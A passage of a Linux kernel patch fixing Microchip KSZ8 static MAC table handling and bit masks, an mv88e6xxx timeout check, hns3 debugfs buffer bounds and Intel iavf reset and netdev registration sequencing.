+-			(data_hi & masks[STATIC_MAC_TABLE_FWD_PORTS]) >>
+-				shifts[STATIC_MAC_FWD_PORTS];
+-		alu->is_override =
+-			(data_hi & masks[STATIC_MAC_TABLE_OVERRIDE]) ? 1 : 0;
+-		data_hi >>= 1;
+-		alu->is_static = true;
+-		alu->is_use_fid =
+-			(data_hi & masks[STATIC_MAC_TABLE_USE_FID]) ? 1 : 0;
+-		alu->fid = (data_hi & masks[STATIC_MAC_TABLE_FID]) >>
+-				shifts[STATIC_MAC_FID];
++
++	if (!(data_hi & (masks[STATIC_MAC_TABLE_VALID] |
++			 masks[STATIC_MAC_TABLE_OVERRIDE]))) {
++		*valid = false;
+ 		return 0;
+ 	}
+-	return -ENXIO;
++
++	alu->mac[5] = (u8)data_lo;
++	alu->mac[4] = (u8)(data_lo >> 8);
++	alu->mac[3] = (u8)(data_lo >> 16);
++	alu->mac[2] = (u8)(data_lo >> 24);
++	alu->mac[1] = (u8)data_hi;
++	alu->mac[0] = (u8)(data_hi >> 8);
++	alu->port_forward =
++		(data_hi & masks[STATIC_MAC_TABLE_FWD_PORTS]) >>
++			shifts[STATIC_MAC_FWD_PORTS];
++	alu->is_override = (data_hi & masks[STATIC_MAC_TABLE_OVERRIDE]) ? 1 : 0;
++
++	/* KSZ8795 family switches have STATIC_MAC_TABLE_USE_FID and
++	 * STATIC_MAC_TABLE_FID definitions off by 1 when doing read on the
++	 * static MAC table compared to doing write.
++	 */
++	if (ksz_is_ksz87xx(dev))
++		data_hi >>= 1;
++	alu->is_static = true;
++	alu->is_use_fid = (data_hi & masks[STATIC_MAC_TABLE_USE_FID]) ? 1 : 0;
++	alu->fid = (data_hi & masks[STATIC_MAC_TABLE_FID]) >>
++		shifts[STATIC_MAC_FID];
++
++	*valid = true;
++
++	return 0;
+ }
+ 
+ void ksz8_w_sta_mac_table(struct ksz_device *dev, u16 addr,
+@@ -926,24 +936,29 @@ int ksz8_fdb_dump(struct ksz_device *dev, int port,
+ 	return ret;
+ }
+ 
+-int ksz8_mdb_add(struct ksz_device *dev, int port,
+-		 const struct switchdev_obj_port_mdb *mdb, struct dsa_db db)
++static int ksz8_add_sta_mac(struct ksz_device *dev, int port,
++			    const unsigned char *addr, u16 vid)
+ {
+ 	struct alu_struct alu;
+-	int index;
++	int index, ret;
+ 	int empty = 0;
+ 
+ 	alu.port_forward = 0;
+ 	for (index = 0; index < dev->info->num_statics; index++) {
+-		if (!ksz8_r_sta_mac_table(dev, index, &alu)) {
+-			/* Found one already in static MAC table. */
+-			if (!memcmp(alu.mac, mdb->addr, ETH_ALEN) &&
+-			    alu.fid == mdb->vid)
+-				break;
+-		/* Remember the first empty entry. */
+-		} else if (!empty) {
+-			empty = index + 1;
++		bool valid;
++
++		ret = ksz8_r_sta_mac_table(dev, index, &alu, &valid);
++		if (ret)
++			return ret;
++		if (!valid) {
++			/* Remember the first empty entry. */
++			if (!empty)
++				empty = index + 1;
++			continue;
+ 		}
++
++		if (!memcmp(alu.mac, addr, ETH_ALEN) && alu.fid == vid)
++			break;
+ 	}
+ 
+ 	/* no available entry */
+@@ -954,34 +969,38 @@ int ksz8_mdb_add(struct ksz_device *dev, int port,
+ 	if (index == dev->info->num_statics) {
+ 		index = empty - 1;
+ 		memset(&alu, 0, sizeof(alu));
+-		memcpy(alu.mac, mdb->addr, ETH_ALEN);
++		memcpy(alu.mac, addr, ETH_ALEN);
+ 		alu.is_static = true;
+ 	}
+ 	alu.port_forward |= BIT(port);
+-	if (mdb->vid) {
++	if (vid) {
+ 		alu.is_use_fid = true;
+ 
+ 		/* Need a way to map VID to FID. */
+-		alu.fid = mdb->vid;
++		alu.fid = vid;
+ 	}
+ 	ksz8_w_sta_mac_table(dev, index, &alu);
+ 
+ 	return 0;
+ }
+ 
+-int ksz8_mdb_del(struct ksz_device *dev, int port,
+-		 const struct switchdev_obj_port_mdb *mdb, struct dsa_db db)
++static int ksz8_del_sta_mac(struct ksz_device *dev, int port,
++			    const unsigned char *addr, u16 vid)
+ {
+ 	struct alu_struct alu;
+-	int index;
++	int index, ret;
+ 
+ 	for (index = 0; index < dev->info->num_statics; index++) {
+-		if (!ksz8_r_sta_mac_table(dev, index, &alu)) {
+-			/* Found one already in static MAC table. */
+-			if (!memcmp(alu.mac, mdb->addr, ETH_ALEN) &&
+-			    alu.fid == mdb->vid)
+-				break;
+-		}
++		bool valid;
++
++		ret = ksz8_r_sta_mac_table(dev, index, &alu, &valid);
++		if (ret)
++			return ret;
++		if (!valid)
++			continue;
++
++		if (!memcmp(alu.mac, addr, ETH_ALEN) && alu.fid == vid)
++			break;
+ 	}
+ 
+ 	/* no available entry */
+@@ -998,6 +1017,18 @@ exit:
+ 	return 0;
+ }
+ 
++int ksz8_mdb_add(struct ksz_device *dev, int port,
++		 const struct switchdev_obj_port_mdb *mdb, struct dsa_db db)
++{
++	return ksz8_add_sta_mac(dev, port, mdb->addr, mdb->vid);
++}
++
++int ksz8_mdb_del(struct ksz_device *dev, int port,
++		 const struct switchdev_obj_port_mdb *mdb, struct dsa_db db)
++{
++	return ksz8_del_sta_mac(dev, port, mdb->addr, mdb->vid);
++}
++
+ int ksz8_port_vlan_filtering(struct ksz_device *dev, int port, bool flag,
+ 			     struct netlink_ext_ack *extack)
+ {
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index 3d59298eaa5cf..8c492d56d2c36 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -286,13 +286,13 @@ static const u32 ksz8795_masks[] = {
+ 	[STATIC_MAC_TABLE_VALID]	= BIT(21),
+ 	[STATIC_MAC_TABLE_USE_FID]	= BIT(23),
+ 	[STATIC_MAC_TABLE_FID]		= GENMASK(30, 24),
+-	[STATIC_MAC_TABLE_OVERRIDE]	= BIT(26),
+-	[STATIC_MAC_TABLE_FWD_PORTS]	= GENMASK(24, 20),
++	[STATIC_MAC_TABLE_OVERRIDE]	= BIT(22),
++	[STATIC_MAC_TABLE_FWD_PORTS]	= GENMASK(20, 16),
+ 	[DYNAMIC_MAC_TABLE_ENTRIES_H]	= GENMASK(6, 0),
+-	[DYNAMIC_MAC_TABLE_MAC_EMPTY]	= BIT(8),
++	[DYNAMIC_MAC_TABLE_MAC_EMPTY]	= BIT(7),
+ 	[DYNAMIC_MAC_TABLE_NOT_READY]	= BIT(7),
+ 	[DYNAMIC_MAC_TABLE_ENTRIES]	= GENMASK(31, 29),
+-	[DYNAMIC_MAC_TABLE_FID]		= GENMASK(26, 20),
++	[DYNAMIC_MAC_TABLE_FID]		= GENMASK(22, 16),
+ 	[DYNAMIC_MAC_TABLE_SRC_PORT]	= GENMASK(26, 24),
+ 	[DYNAMIC_MAC_TABLE_TIMESTAMP]	= GENMASK(28, 27),
+ 	[P_MII_TX_FLOW_CTRL]		= BIT(5),
+diff --git a/drivers/net/dsa/microchip/ksz_common.h b/drivers/net/dsa/microchip/ksz_common.h
+index 9cfa179575ce8..d1b2db8e65331 100644
+--- a/drivers/net/dsa/microchip/ksz_common.h
++++ b/drivers/net/dsa/microchip/ksz_common.h
+@@ -512,6 +512,13 @@ static inline void ksz_regmap_unlock(void *__mtx)
+ 	mutex_unlock(mtx);
+ }
+ 
++static inline bool ksz_is_ksz87xx(struct ksz_device *dev)
++{
++	return dev->chip_id == KSZ8795_CHIP_ID ||
++	       dev->chip_id == KSZ8794_CHIP_ID ||
++	       dev->chip_id == KSZ8765_CHIP_ID;
++}
++
+ static inline bool ksz_is_ksz88x3(struct ksz_device *dev)
+ {
+ 	return dev->chip_id == KSZ8830_CHIP_ID;
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 4db1652015d1d..b69bd44ada1f2 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -109,6 +109,13 @@ int mv88e6xxx_wait_mask(struct mv88e6xxx_chip *chip, int addr, int reg,
+ 			usleep_range(1000, 2000);
+ 	}
+ 
++	err = mv88e6xxx_read(chip, addr, reg, &data);
++	if (err)
++		return err;
++
++	if ((data & mask) == val)
++		return 0;
++
+ 	dev_err(chip->dev, "Timeout while waiting for switch\n");
+ 	return -ETIMEDOUT;
+ }
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+index bcccd82a2620f..f6ededec5a4fa 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_debugfs.c
+@@ -435,19 +435,36 @@ static void hns3_dbg_fill_content(char *content, u16 len,
+ 				  const struct hns3_dbg_item *items,
+ 				  const char **result, u16 size)
+ {
++#define HNS3_DBG_LINE_END_LEN	2
+ 	char *pos = content;
++	u16 item_len;
+ 	u16 i;
+ 
++	if (!len) {
++		return;
++	} else if (len <= HNS3_DBG_LINE_END_LEN) {
++		*pos++ = '\0';
++		return;
++	}
++
+ 	memset(content, ' ', len);
+-	for (i = 0; i < size; i++) {
+-		if (result)
+-			strncpy(pos, result[i], strlen(result[i]));
+-		else
+-			strncpy(pos, items[i].name, strlen(items[i].name));
++	len -= HNS3_DBG_LINE_END_LEN;
+ 
+-		pos += strlen(items[i].name) + items[i].interval;
++	for (i = 0; i < size; i++) {
++		item_len = strlen(items[i].name) + items[i].interval;
++		if (len < item_len)
++			break;
++
++		if (result) {
++			if (item_len < strlen(result[i]))
++				break;
++			strscpy(pos, result[i], strlen(result[i]));
++		} else {
++			strscpy(pos, items[i].name, strlen(items[i].name));
++		}
++		pos += item_len;
++		len -= item_len;
+ 	}
+-
+ 	*pos++ = '\n';
+ 	*pos++ = '\0';
+ }
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+index 142415c84c6b2..0ebc21401b7c2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_debugfs.c
+@@ -87,16 +87,35 @@ static void hclge_dbg_fill_content(char *content, u16 len,
+ 				   const struct hclge_dbg_item *items,
+ 				   const char **result, u16 size)
+ {
++#define HCLGE_DBG_LINE_END_LEN	2
+ 	char *pos = content;
++	u16 item_len;
+ 	u16 i;
+ 
++	if (!len) {
++		return;
++	} else if (len <= HCLGE_DBG_LINE_END_LEN) {
++		*pos++ = '\0';
++		return;
++	}
++
+ 	memset(content, ' ', len);
++	len -= HCLGE_DBG_LINE_END_LEN;
++
+ 	for (i = 0; i < size; i++) {
+-		if (result)
+-			strncpy(pos, result[i], strlen(result[i]));
+-		else
+-			strncpy(pos, items[i].name, strlen(items[i].name));
+-		pos += strlen(items[i].name) + items[i].interval;
++		item_len = strlen(items[i].name) + items[i].interval;
++		if (len < item_len)
++			break;
++
++		if (result) {
++			if (item_len < strlen(result[i]))
++				break;
++			strscpy(pos, result[i], strlen(result[i]));
++		} else {
++			strscpy(pos, items[i].name, strlen(items[i].name));
++		}
++		pos += item_len;
++		len -= item_len;
+ 	}
+ 	*pos++ = '\n';
+ 	*pos++ = '\0';
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 6625625f91e47..543931c06bb17 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -255,8 +255,10 @@ struct iavf_adapter {
+ 	struct workqueue_struct *wq;
+ 	struct work_struct reset_task;
+ 	struct work_struct adminq_task;
++	struct work_struct finish_config;
+ 	struct delayed_work client_task;
+ 	wait_queue_head_t down_waitqueue;
++	wait_queue_head_t reset_waitqueue;
+ 	wait_queue_head_t vc_waitqueue;
+ 	struct iavf_q_vector *q_vectors;
+ 	struct list_head vlan_filter_list;
+@@ -518,14 +520,12 @@ int iavf_up(struct iavf_adapter *adapter);
+ void iavf_down(struct iavf_adapter *adapter);
+ int iavf_process_config(struct iavf_adapter *adapter);
+ int iavf_parse_vf_resource_msg(struct iavf_adapter *adapter);
+-void iavf_schedule_reset(struct iavf_adapter *adapter);
++void iavf_schedule_reset(struct iavf_adapter *adapter, u64 flags);
+ void iavf_schedule_request_stats(struct iavf_adapter *adapter);
++void iavf_schedule_finish_config(struct iavf_adapter *adapter);
+ void iavf_reset(struct iavf_adapter *adapter);
+ void iavf_set_ethtool_ops(struct net_device *netdev);
+ void iavf_update_stats(struct iavf_adapter *adapter);
+-void iavf_reset_interrupt_capability(struct iavf_adapter *adapter);
+-int iavf_init_interrupt_scheme(struct iavf_adapter *adapter);
+-void iavf_irq_enable_queues(struct iavf_adapter *adapter);
+ void iavf_free_all_tx_resources(struct iavf_adapter *adapter);
+ void iavf_free_all_rx_resources(struct iavf_adapter *adapter);
+ 
+@@ -579,17 +579,11 @@ void iavf_enable_vlan_stripping_v2(struct iavf_adapter *adapter, u16 tpid);
+ void iavf_disable_vlan_stripping_v2(struct iavf_adapter *adapter, u16 tpid);
+ void iavf_enable_vlan_insertion_v2(struct iavf_adapter *adapter, u16 tpid);
+ void iavf_disable_vlan_insertion_v2(struct iavf_adapter *adapter, u16 tpid);
+-int iavf_replace_primary_mac(struct iavf_adapter *adapter,
+-			     const u8 *new_mac);
+-void
+-iavf_set_vlan_offload_features(struct iavf_adapter *adapter,
+-			       netdev_features_t prev_features,
+-			       netdev_features_t features);
+ void iavf_add_fdir_filter(struct iavf_adapter *adapter);
+ void iavf_del_fdir_filter(struct iavf_adapter *adapter);
+ void iavf_add_adv_rss_cfg(struct iavf_adapter *adapter);
+ void iavf_del_adv_rss_cfg(struct iavf_adapter *adapter);
+ struct iavf_mac_filter *iavf_add_filter(struct iavf_adapter *adapter,
+ 					const u8 *macaddr);
+-int iavf_lock_timeout(struct mutex *lock, unsigned int msecs);
++int iavf_wait_for_reset(struct iavf_adapter *adapter);
+ #endif /* _IAVF_H_ */
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index 83cfc54a47062..fd6d6f6263f66 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -484,6 +484,7 @@ static int iavf_set_priv_flags(struct net_device *netdev, u32 flags)
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 	u32 orig_flags, new_flags, changed_flags;
++	int ret = 0;
+ 	u32 i;
+ 
+ 	orig_flags = READ_ONCE(adapter->flags);
+@@ -531,12 +532,14 @@ static int iavf_set_priv_flags(struct net_device *netdev, u32 flags)
+ 	/* issue a reset to force legacy-rx change to take effect */
+ 	if (changed_flags & IAVF_FLAG_LEGACY_RX) {
+ 		if (netif_running(netdev)) {
+-			adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-			queue_work(adapter->wq, &adapter->reset_task);
++			iavf_schedule_reset(adapter, IAVF_FLAG_RESET_NEEDED);
++			ret = iavf_wait_for_reset(adapter);
++			if (ret)
++				netdev_warn(netdev, "Changing private flags timeout or interrupted waiting for reset");
+ 		}
+ 	}
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ /**
+@@ -627,6 +630,7 @@ static int iavf_set_ringparam(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 	u32 new_rx_count, new_tx_count;
++	int ret = 0;
+ 
+ 	if ((ring->rx_mini_pending) || (ring->rx_jumbo_pending))
+ 		return -EINVAL;
+@@ -671,11 +675,13 @@ static int iavf_set_ringparam(struct net_device *netdev,
+ 	}
+ 
+ 	if (netif_running(netdev)) {
+-		adapter->flags |= IAVF_FLAG_RESET_NEEDED;
+-		queue_work(adapter->wq, &adapter->reset_task);
++		iavf_schedule_reset(adapter, IAVF_FLAG_RESET_NEEDED);
++		ret = iavf_wait_for_reset(adapter);
++		if (ret)
++			netdev_warn(netdev, "Changing ring parameters timeout or interrupted waiting for reset");
+ 	}
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ /**
+@@ -1830,7 +1836,7 @@ static int iavf_set_channels(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 	u32 num_req = ch->combined_count;
+-	int i;
++	int ret = 0;
+ 
+ 	if ((adapter->vf_res->vf_cap_flags & VIRTCHNL_VF_OFFLOAD_ADQ) &&
+ 	    adapter->num_tc) {
+@@ -1852,22 +1858,13 @@ static int iavf_set_channels(struct net_device *netdev,
+ 
+ 	adapter->num_req_queues = num_req;
+ 	adapter->flags |= IAVF_FLAG_REINIT_ITR_NEEDED;
+-	iavf_schedule_reset(adapter);
++	iavf_schedule_reset(adapter, IAVF_FLAG_RESET_NEEDED);
+ 
+-	/* wait for the reset is done */
+-	for (i = 0; i < IAVF_RESET_WAIT_COMPLETE_COUNT; i++) {
+-		msleep(IAVF_RESET_WAIT_MS);
+-		if (adapter->flags & IAVF_FLAG_RESET_PENDING)
+-			continue;
+-		break;
+-	}
+-	if (i == IAVF_RESET_WAIT_COMPLETE_COUNT) {
+-		adapter->flags &= ~IAVF_FLAG_REINIT_ITR_NEEDED;
+-		adapter->num_active_queues = num_req;
+-		return -EOPNOTSUPP;
+-	}
++	ret = iavf_wait_for_reset(adapter);
++	if (ret)
++		netdev_warn(netdev, "Changing channel count timeout or interrupted waiting for reset");
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 965d02d7ff80f..c1f91c55e1ca7 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -166,6 +166,45 @@ static struct iavf_adapter *iavf_pdev_to_adapter(struct pci_dev *pdev)
+ 	return netdev_priv(pci_get_drvdata(pdev));
+ }
+ 
++/**
++ * iavf_is_reset_in_progress - Check if a reset is in progress
++ * @adapter: board private structure
++ */
++static bool iavf_is_reset_in_progress(struct iavf_adapter *adapter)
++{
++	if (adapter->state == __IAVF_RESETTING ||
++	    adapter->flags & (IAVF_FLAG_RESET_PENDING |
++			      IAVF_FLAG_RESET_NEEDED))
++		return true;
++
++	return false;
++}
++
++/**
++ * iavf_wait_for_reset - Wait for reset to finish.
++ * @adapter: board private structure
++ *
++ * Returns 0 if reset finished successfully, negative on timeout or interrupt.
++ */
++int iavf_wait_for_reset(struct iavf_adapter *adapter)
++{
++	int ret = wait_event_interruptible_timeout(adapter->reset_waitqueue,
++					!iavf_is_reset_in_progress(adapter),
++					msecs_to_jiffies(5000));
++
++	/* If ret < 0 then it means wait was interrupted.
++	 * If ret == 0 then it means we got a timeout while waiting
++	 * for reset to finish.
++	 * If ret > 0 it means reset has finished.
++	 */
++	if (ret > 0)
++		return 0;
++	else if (ret < 0)
++		return -EINTR;
++	else
++		return -EBUSY;
++}
++
+ /**
+  * iavf_allocate_dma_mem_d - OS specific memory alloc for shared code
+  * @hw:   pointer to the HW structure
+@@ -253,7 +292,7 @@ enum iavf_status iavf_free_virt_mem_d(struct iavf_hw *hw,
+  *
+  * Returns 0 on success, negative on failure
+  **/
+-int iavf_lock_timeout(struct mutex *lock, unsigned int msecs)
++static int iavf_lock_timeout(struct mutex *lock, unsigned int msecs)
+ {
+ 	unsigned int wait, delay = 10;
+ 
+@@ -270,12 +309,14 @@ int iavf_lock_timeout(struct mutex *lock, unsigned int msecs)
+ /**
+  * iavf_schedule_reset - Set the flags and schedule a reset event
+  * @adapter: board private structure
++ * @flags: IAVF_FLAG_RESET_PENDING or IAVF_FLAG_RESET_NEEDED
+  **/
+-void iavf_schedule_reset(struct iavf_adapter *adapter)
++void iavf_schedule_reset(struct iavf_adapter *adapter, u64 flags)
+ {
+-	if (!(adapter->flags &
+-	      (IAVF_FLAG_RESET_PENDING | IAVF_FLAG_RESET_NEEDED))) {
+-		adapter->flags |= IAVF_FLAG_RESET_NEEDED;
++	if (!test_bit(__IAVF_IN_REMOVE_TASK, &adapter->crit_section) &&
++	    !(adapter->flags &
++	    (IAVF_FLAG_RESET_PENDING | IAVF_FLAG_RESET_NEEDED))) {
++		adapter->flags |= flags;
+ 		queue_work(adapter->wq, &adapter->reset_task);
+ 	}
+ }
+@@ -303,7 +344,7 @@ static void iavf_tx_timeout(struct net_device *netdev, unsigned int txqueue)
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 
+ 	adapter->tx_timeout_count++;
+-	iavf_schedule_reset(adapter);
++	iavf_schedule_reset(adapter, IAVF_FLAG_RESET_NEEDED);
+ }
+ 
+ /**
+@@ -362,7 +403,7 @@ static void iavf_irq_disable(struct iavf_adapter *adapter)
+  * iavf_irq_enable_queues - Enable interrupt for all queues
+  * @adapter: board private structure
+  **/
+-void iavf_irq_enable_queues(struct iavf_adapter *adapter)
++static void iavf_irq_enable_queues(struct iavf_adapter *adapter)
+ {
+ 	struct iavf_hw *hw = &adapter->hw;
+ 	int i;
+@@ -1003,8 +1044,8 @@ struct iavf_mac_filter *iavf_add_filter(struct iavf_adapter *adapter,
+  *
+  * Do not call this with mac_vlan_list_lock!
+  **/
+-int iavf_replace_primary_mac(struct iavf_adapter *adapter,
+-			     const u8 *new_mac)
++static int iavf_replace_primary_mac(struct iavf_adapter *adapter,
++				    const u8 *new_mac)
+ {
+ 	struct iavf_hw *hw = &adapter->hw;
+ 	struct iavf_mac_filter *f;
+@@ -1663,10 +1704,10 @@ static int iavf_set_interrupt_capability(struct iavf_adapter *adapter)
+ 		adapter->msix_entries[vector].entry = vector;
+ 
+ 	err = iavf_acquire_msix_vectors(adapter, v_budget);
++	if (!err)
++		iavf_schedule_finish_config(adapter);
+ 
+ out:
+-	netif_set_real_num_rx_queues(adapter->netdev, pairs);
+-	netif_set_real_num_tx_queues(adapter->netdev, pairs);
+ 	return err;
+ }
+ 
+@@ -1840,19 +1881,16 @@ static int iavf_alloc_q_vectors(struct iavf_adapter *adapter)
+ static void iavf_free_q_vectors(struct iavf_adapter *adapter)
+ {
+ 	int q_idx, num_q_vectors;
+-	int napi_vectors;
+ 
+ 	if (!adapter->q_vectors)
+ 		return;
+ 
+ 	num_q_vectors = adapter->num_msix_vectors - NONQ_VECS;
+-	napi_vectors = adapter->num_active_queues;
+ 
+ 	for (q_idx = 0; q_idx < num_q_vectors; q_idx++) {
+ 		struct iavf_q_vector *q_vector = &adapter->q_vectors[q_idx];
+ 
+-		if (q_idx < napi_vectors)
+-			netif_napi_del(&q_vector->napi);
++		netif_napi_del(&q_vector->napi);
+ 	}
+ 	kfree(adapter->q_vectors);
+ 	adapter->q_vectors = NULL;
+@@ -1863,7 +1901,7 @@ static void iavf_free_q_vectors(struct iavf_adapter *adapter)
+  * @adapter: board private structure
+  *
+  **/
+-void iavf_reset_interrupt_capability(struct iavf_adapter *adapter)
++static void iavf_reset_interrupt_capability(struct iavf_adapter *adapter)
+ {
+ 	if (!adapter->msix_entries)
+ 		return;
+@@ -1878,7 +1916,7 @@ void iavf_reset_interrupt_capability(struct iavf_adapter *adapter)
+  * @adapter: board private structure to initialize
+  *
+  **/
+-int iavf_init_interrupt_scheme(struct iavf_adapter *adapter)
++static int iavf_init_interrupt_scheme(struct iavf_adapter *adapter)
+ {
+ 	int err;
+ 
+@@ -1889,9 +1927,7 @@ int iavf_init_interrupt_scheme(struct iavf_adapter *adapter)
+ 		goto err_alloc_queues;
+ 	}
+ 
+-	rtnl_lock();
+ 	err = iavf_set_interrupt_capability(adapter);
+-	rtnl_unlock();
+ 	if (err) {
+ 		dev_err(&adapter->pdev->dev,
+ 			"Unable to setup interrupt capabilities\n");
+@@ -1944,15 +1980,16 @@ static void iavf_free_rss(struct iavf_adapter *adapter)
+ /**
+  * iavf_reinit_interrupt_scheme - Reallocate queues and vectors
+  * @adapter: board private structure
++ * @running: true if adapter->state == __IAVF_RUNNING
+  *
+  * Returns 0 on success, negative on failure
+  **/
+-static int iavf_reinit_interrupt_scheme(struct iavf_adapter *adapter)
++static int iavf_reinit_interrupt_scheme(struct iavf_adapter *adapter, bool running)
+ {
+ 	struct net_device *netdev = adapter->netdev;
+ 	int err;
+ 
+-	if (netif_running(netdev))
++	if (running)
+ 		iavf_free_traffic_irqs(adapter);
+ 	iavf_free_misc_irq(adapter);
+ 	iavf_reset_interrupt_capability(adapter);
+@@ -1976,6 +2013,78 @@ err:
+ 	return err;
+ }
+ 
++/**
++ * iavf_finish_config - do all netdev work that needs RTNL
++ * @work: our work_struct
++ *
++ * Do work that needs both RTNL and crit_lock.
++ **/
++static void iavf_finish_config(struct work_struct *work)
++{
++	struct iavf_adapter *adapter;
++	int pairs, err;
++
++	adapter = container_of(work, struct iavf_adapter, finish_config);
++
++	/* Always take RTNL first to prevent circular lock dependency */
++	rtnl_lock();
++	mutex_lock(&adapter->crit_lock);
++
++	if ((adapter->flags & IAVF_FLAG_SETUP_NETDEV_FEATURES) &&
++	    adapter->netdev_registered &&
++	    !test_bit(__IAVF_IN_REMOVE_TASK, &adapter->crit_section)) {
++		netdev_update_features(adapter->netdev);
++		adapter->flags &= ~IAVF_FLAG_SETUP_NETDEV_FEATURES;
++	}
++
++	switch (adapter->state) {
++	case __IAVF_DOWN:
++		if (!adapter->netdev_registered) {
++			err = register_netdevice(adapter->netdev);
++			if (err) {
++				dev_err(&adapter->pdev->dev, "Unable to register netdev (%d)\n",
++					err);
++
++				/* go back and try again.*/
++				iavf_free_rss(adapter);
++				iavf_free_misc_irq(adapter);
++				iavf_reset_interrupt_capability(adapter);
++				iavf_change_state(adapter,
++						  __IAVF_INIT_CONFIG_ADAPTER);
++				goto out;
++			}
++			adapter->netdev_registered = true;
++		}
++
++		/* Set the real number of queues when reset occurs while
++		 * state == __IAVF_DOWN
++		 */
++		fallthrough;
++	case __IAVF_RUNNING:
++		pairs = adapter->num_active_queues;
++		netif_set_real_num_rx_queues(adapter->netdev, pairs);
++		netif_set_real_num_tx_queues(adapter->netdev, pairs);
++		break;
++
++	default:
++		break;
++	}
++
++out:
++	mutex_unlock(&adapter->crit_lock);
++	rtnl_unlock();
++}
++
++/**
++ * iavf_schedule_finish_config - Set the flags and schedule a reset event
++ * @adapter: board private structure
++ **/
++void iavf_schedule_finish_config(struct iavf_adapter *adapter)
++{
++	if (!test_bit(__IAVF_IN_REMOVE_TASK, &adapter->crit_section))
++		queue_work(adapter->wq, &adapter->finish_config);
++}
++
+ /**
+  * iavf_process_aq_command - process aq_required flags
+  * and sends aq command
+@@ -2176,7 +2285,7 @@ static int iavf_process_aq_command(struct iavf_adapter *adapter)
+  * the watchdog if any changes are requested to expedite the request via
+  * virtchnl.
+  **/
+-void
++static void
+ iavf_set_vlan_offload_features(struct iavf_adapter *adapter,
+ 			       netdev_features_t prev_features,
+ 			       netdev_features_t features)
+@@ -2383,7 +2492,7 @@ int iavf_parse_vf_resource_msg(struct iavf_adapter *adapter)
+ 			adapter->vsi_res->num_queue_pairs);
+ 		adapter->flags |= IAVF_FLAG_REINIT_MSIX_NEEDED;
+ 		adapter->num_req_queues = adapter->vsi_res->num_queue_pairs;
+-		iavf_schedule_reset(adapter);
++		iavf_schedule_reset(adapter, IAVF_FLAG_RESET_NEEDED);
+ 
+ 		return -EAGAIN;
+ 	}
+@@ -2613,22 +2722,8 @@ static void iavf_init_config_adapter(struct iavf_adapter *adapter)
+ 
+ 	netif_carrier_off(netdev);
+ 	adapter->link_up = false;
+-
+-	/* set the semaphore to prevent any callbacks after device registration
+-	 * up to time when state of driver will be set to __IAVF_DOWN
+-	 */
+-	rtnl_lock();
+-	if (!adapter->netdev_registered) {
+-		err = register_netdevice(netdev);
+-		if (err) {
+-			rtnl_unlock();
+-			goto err_register;
+-		}
+-	}
+-
+-	adapter->netdev_registered = true;
+-
+ 	netif_tx_stop_all_queues(netdev);
++
+ 	if (CLIENT_ALLOWED(adapter)) {
+ 		err = iavf_lan_add_device(adapter);
+ 		if (err)
+@@ -2641,7 +2736,6 @@ static void iavf_init_config_adapter(struct iavf_adapter *adapter)
+ 
+ 	iavf_change_state(adapter, __IAVF_DOWN);
+ 	set_bit(__IAVF_VSI_DOWN, adapter->vsi.state);
+-	rtnl_unlock();
+ 
+ 	iavf_misc_irq_enable(adapter);
+ 	wake_up(&adapter->down_waitqueue);
+@@ -2661,10 +2755,11 @@ static void iavf_init_config_adapter(struct iavf_adapter *adapter)
+ 		/* request initial VLAN offload settings */
+ 		iavf_set_vlan_offload_features(adapter, 0, netdev->features);
+ 
++	iavf_schedule_finish_config(adapter);
+ 	return;
++
+ err_mem:
+ 	iavf_free_rss(adapter);
+-err_register:
+ 	iavf_free_misc_irq(adapter);
+ err_sw_init:
+ 	iavf_reset_interrupt_capability(adapter);
+@@ -2694,14 +2789,6 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 	if (adapter->flags & IAVF_FLAG_PF_COMMS_FAILED)
+ 		iavf_change_state(adapter, __IAVF_COMM_FAILED);
+ 
+-	if (adapter->flags & IAVF_FLAG_RESET_NEEDED) {
+-		adapter->aq_required = 0;
+-		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+-		mutex_unlock(&adapter->crit_lock);
+-		queue_work(adapter->wq, &adapter->reset_task);
+-		return;
+-	}
+-
+ 	switch (adapter->state) {
+ 	case __IAVF_STARTUP:
+ 		iavf_startup(adapter);
+@@ -2829,11 +2916,10 @@ static void iavf_watchdog_task(struct work_struct *work)
+ 	/* check for hw reset */
